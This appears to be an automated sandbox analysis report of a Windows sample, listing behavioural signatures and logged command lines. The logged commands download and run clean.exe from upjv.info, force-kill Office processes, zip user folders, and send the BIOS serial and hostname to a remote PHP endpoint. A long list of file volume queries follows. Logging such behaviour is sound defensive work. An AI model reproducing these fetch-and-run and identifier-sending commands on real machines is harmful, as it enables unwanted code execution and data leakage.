Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 22_2_00000184C7D42377 rdtsc 22_2_00000184C7D42377
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Code function: 0_2_00407551 LoadLibraryA,GetProcAddress,GetVersionExA, 0_2_00407551
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Code function: 0_2_00405480 SetUnhandledExceptionFilter, 0_2_00405480
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Code function: 0_2_00405330 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter, 0_2_00405330
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\ariac.exe \Users\user\TMP\cr-20241021-53901\ariac.exe -l log.txt -o clean.exe http://upjv.info/clean/clean2.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\clean.exe clean.exe -y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM WINWORD.EXE /T /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM EXCEL.EXE /T /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM SOFFICE.BIN /T /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe \Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe a \Users\user\TMP\cr-20241021-53901.zip \Users\user\TMP\cr-20241021-53901 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic bios get serialnumber Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\more.com more +1 serialnumber.txt Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\ariac.exe \Users\user\TMP\cr-20241021-53901\ariac.exe -l log2.txt -o result.html "http://upjv.info/clean/entree.php?poste=user-PC^&serial=F2LEUD3EOH" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "http://upjv.info/clean/clean.php?serial=F2LEUD3EOH" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 420 Jump to behavior
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM WINWORD.EXE /T /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM EXCEL.EXE /T /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM SOFFICE.BIN /T /F Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Desktop\IVHSHTCODI.docx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Desktop\IVHSHTCODI.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Desktop\JDSOXXXWOA.docx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Desktop\JDSOXXXWOA.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Desktop\MQAWXUYAIK.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Desktop\MQAWXUYAIK.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Desktop\PSAMNLJHZW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Desktop\TTCBKWZYOC.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Desktop\UQMPCTZARJ.docx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Documents\IVHSHTCODI.docx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Documents\IVHSHTCODI.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Documents\JDSOXXXWOA.docx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Documents\JDSOXXXWOA.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Documents\MQAWXUYAIK.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Documents\MQAWXUYAIK.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Documents\PSAMNLJHZW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Documents\TTCBKWZYOC.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Documents\UQMPCTZARJ.docx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Downloads\IVHSHTCODI.docx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Downloads\IVHSHTCODI.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Downloads\JDSOXXXWOA.docx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Downloads\JDSOXXXWOA.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Downloads\MQAWXUYAIK.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Downloads\MQAWXUYAIK.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Downloads\PSAMNLJHZW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Downloads\TTCBKWZYOC.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\Downloads\UQMPCTZARJ.docx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\ariac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean.exe VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\deleteWord.bat VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\deleteWord.err VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Version_2018_11_07.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\7-ZipPortable.exe VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip.chm VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip.dll VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip32.dll VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.dll VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.exe VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.sfx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zCon.sfx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zFM.exe VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zG.exe VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\descript.ion VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\History.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\License.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\readme.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7-zip.chm VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7-zip.dll VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.dll VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.sfx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zCon.sfx VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zFM.exe VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zG.exe VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\descript.ion VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\History.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\af.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\an.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ar.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ast.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\az.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ba.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\be.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\bg.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\bn.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\br.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ca.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\co.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\cs.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\cy.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\da.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\de.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\el.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\en.ttt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\eo.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\es.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\et.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\eu.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ext.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fa.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fi.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fr.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fur.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fy.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ga.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\gl.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\gu.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\he.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\hi.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\hr.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\hu.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\hy.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\id.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\io.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\is.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\it.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ja.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ka.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\kaa.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\kab.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\kk.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ko.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ku-ckb.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ku.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ky.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\lij.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\lt.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\lv.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mk.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mn.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mng.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mng2.txt VolumeInformation Jump to behavior
